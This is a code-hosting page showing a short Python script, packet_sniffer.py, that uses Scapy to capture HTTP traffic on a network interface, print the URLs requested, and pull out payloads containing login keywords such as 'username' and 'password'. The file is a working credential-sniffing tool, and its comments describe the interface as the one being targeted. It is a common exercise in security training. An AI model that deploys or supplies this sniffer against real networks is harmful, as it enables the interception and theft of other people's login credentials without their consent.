-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathpacket_sniffer.py
More file actions
31 lines (22 loc) · 1.27 KB
/
packet_sniffer.py
File metadata and controls
31 lines (22 loc) · 1.27 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import scapy.all as scapy
from scapy.layers import http
def sniff(interface):
scapy.sniff(iface = interface, store = False, prn = process_sniffed_packet)
def get_url(packet):
return packet[http.HTTPRequest].Host.decode() + packet[http.HTTPRequest].Path.decode() # Python2 vs Python3 .decode() or str(packet.[HTTP...Path) used to convert byte data into str data
def get_login_info(packet):
if packet.haslayer(scapy.Raw): # Normally used
load = packet[scapy.Raw].load.decode(errors="ignore") # CHECKING IF SUBSTRING EXIST (THEN PRINT IT)
keywords = ["username", "user", "login", "password", "pass"] # check for other names like login or email
for keyword in keywords:
if keyword in load:
return load
def process_sniffed_packet(packet):
if packet.haslayer(http.HTTPRequest): # haslayer method, layer can HTTP, TCP etc USABLE BECAUSE WE INSTALLED SCAPY HTTP
# print(packet.show())
url = get_url(packet)
print("[+] HTTP Request >> " + url)
login_info = get_login_info(packet)
if login_info:
print("\n\n[+] Possible keyword > " + login_info + "\n\n")
sniff("eth0") # name of the internet lan interface you are targeting